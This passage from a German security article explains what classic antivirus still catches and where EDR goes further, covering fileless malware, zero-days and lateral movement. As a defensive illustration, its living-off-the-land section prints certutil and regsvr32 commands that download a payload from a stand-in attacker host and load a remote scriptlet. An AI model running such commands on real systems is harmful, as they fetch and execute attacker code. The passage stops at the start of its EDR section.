Endpoint Detection: Was Antivirus heute noch leistet – und was nicht

Key Takeaways

• Klassisches Antivirus erkennt bekannte Malware zuverlässig, ist jedoch blind gegenüber dateilosen Angriffen und Living-off-the-Land-Techniken.
• EDR liefert Verhaltensanalyse, kontinuierliche Telemetrie und Reaktionsfähigkeit – und ist Voraussetzung für NIS-2-konforme Endpunktsicherheit.
• Microsoft Defender for Endpoint Plan 2 ist für viele KMU bereits in der bestehenden M365-Lizenz enthalten – wird aber selten vollständig genutzt.
• Wazuh als Open-Source-SIEM/XDR kann EDR-Telemetrie aggregieren und mit MITRE ATT&CK-Techniken korrelieren.
• Das eigentliche Problem ist nicht die Technologie, sondern die fehlende Auswertung: Telemetrie ohne Monitoring schützt nicht.

Das falsche Sicherheitsgefühl des grünen Hakens

In den meisten mittelständischen Unternehmen läuft auf jedem Arbeitsplatz ein Antivirenprogramm. Der grüne Haken im Systemtray beruhigt, die jährliche Lizenzverlängerung wird als abgehakte Pflichtaufgabe behandelt. Doch was leistet diese Lösung tatsächlich noch im Jahr 2026?

Die kurze Antwort: Antivirus (AV) erfüllt nach wie vor eine wichtige Grundfunktion – aber eben nur eine Grundfunktion. Wer glaubt, damit seine Endpunkte hinreichend abgesichert zu haben, unterschätzt die Angriffsrealität erheblich. Dieser Artikel zeigt sachlich, was AV noch kann, wo es strukturell versagt und was EDR grundlegend anders macht.

Was klassisches Antivirus heute noch leistet

Signaturbasierte Erkennung: Solide für bekannte Bedrohungen

Die Kernfunktion klassischer AV-Lösungen ist die Signaturerkennung. Eine Datenbank bekannter Schadsoftware-Muster – Hashwerte, Byte-Sequenzen, charakteristische Code-Abschnitte – wird mit Dateien auf dem System abgeglichen. Stimmt ein Muster überein, blockiert das AV die Ausführung.

Das funktioniert zuverlässig für:

• Bekannte Malware-Familien wie Emotet-Varianten, WannaCry-Derivate oder Ransomware mit dokumentierten Verschlüsselungsroutinen
• E-Mail-Anhänge mit eingebetteten Makros oder bekannten Exploit-Dokumenten
• Drive-by-Downloads von bekannten Malware-Distributionsseiten
• USB-basierte Verbreitung klassischer Würmer und Trojaner

Anbieter wie ESET, Sophos oder Microsoft Defender Antivirus aktualisieren ihre Signaturdatenbanken mehrmals täglich. Der Schutz gegen Commodity-Malware – also Schadsoftware, die massenhaft verbreitet und gut dokumentiert ist – ist damit weiterhin solide.

Heuristische Analyse: Begrenzte Erweiterung

Moderne AV-Produkte gehen über reine Signaturen hinaus. Sie bewerten Dateieigenschaften wie ungewöhnliche Packer, hohe Entropiewerte (Hinweis auf Verschlüsselung oder Obfuskation) und führen einfache dynamische Analysen in Sandboxen durch. Einige erkennen auch, wenn ein Office-Prozess versucht, PowerShell oder cmd.exe zu starten.

Diese Funktionen verbessern die Erkennungsrate gegenüber leicht modifizierten bekannten Bedrohungen – sie ersetzen aber keine echte Verhaltensanalyse.

Was AV gut kann (Zusammenfassung):

• Commodity-Malware stoppen, bevor sie ausgeführt wird
• Compliance-Grundlage schaffen (BSI IT-Grundschutz SYS.2.1, ISO 27001 A.8.7)
• Einfache Makro-basierte Angriffe in Office-Dokumenten blockieren
• Bekannte Ransomware-Encryption-Patterns erkennen

Wo klassisches Antivirus strukturell versagt

Living-off-the-Land-Angriffe (LotL)

Angreifer nutzen zunehmend Werkzeuge, die bereits auf dem System vorhanden sind – und damit für Antivirus unsichtbar bleiben. PowerShell, WMI, certutil, mshta, regsvr32, bitsadmin: Alle diese Binaries sind legitime Windows-Systemwerkzeuge. Ein AV hat keinen Grund, sie pauschal zu blockieren.

Ein reales Angriffsmuster:

# Angreifer lädt Payload über certutil herunter – legitimes Windows-Tool (MITRE T1105)
certutil.exe -urlcache -split -f http://attacker.example.com/payload.b64 C:\Users\Public\payload.b64
certutil.exe -decode C:\Users\Public\payload.b64 C:\Users\Public\payload.dll

# Payload-Registrierung über regsvr32 – ebenfalls legitim (MITRE T1218.010)
regsvr32 /s /n /u /i:http://attacker.example.com/payload.sct scrobj.dll

Kein signaturbasiertes AV-Produkt wird certutil.exe oder regsvr32.exe an sich blockieren – sie gehören zum Betriebssystem. Die Erkennung dieses Musters erfordert Kontextanalyse: Welcher Parent-Prozess hat certutil gestartet? Wohin geht die Netzwerkverbindung? Was wird heruntergeladen?

Fileless Malware: Kein Scan möglich

Dateilose Angriffe schreiben keine ausführbaren Dateien auf die Festplatte. Der Schadcode existiert ausschließlich im Arbeitsspeicher oder in der Windows-Registry – Bereichen, die klassisches AV primär nicht überwacht.

Techniken wie Process Hollowing, Reflective DLL Injection oder PowerShell-basierte In-Memory-Stages sind in Red-Team-Assessments und realen APT-Kampagnen mittlerweile Standard. Das AV findet nichts, weil es nichts zu scannen gibt.

Zero-Day-Exploits: Per Definition keine Signatur

Für Schwachstellen, die zum Zeitpunkt des Angriffs noch nicht bekannt oder gepatcht sind, existieren keine Signaturen. Wer einen ungepatchten Fehler in Windows, Chrome oder einer Office-Komponente ausnutzt, umgeht jede signaturbasierte Erkennung vollständig. Einzige Erkennungschance: verhaltensbasierte Anomalie-Detektion – und die ist in klassischen AV-Produkten rudimentär.

Credential-Missbrauch und Lateral Movement

Ein Angreifer, der sich nach einem erfolgreichen Phishing-Angriff mit erbeuteten Zugangsdaten im Netz bewegt, verhält sich aus AV-Perspektive wie ein normaler Benutzer. Lateral Movement über psexec, wmiexec, RDP oder SMB fällt nicht auf – es sind keine Malware-Dateien im Spiel, und gültige Credentials sind kein AV-Kriterium.

EDR: Was es grundlegend anders macht

EDR ist kein „besseres Antivirus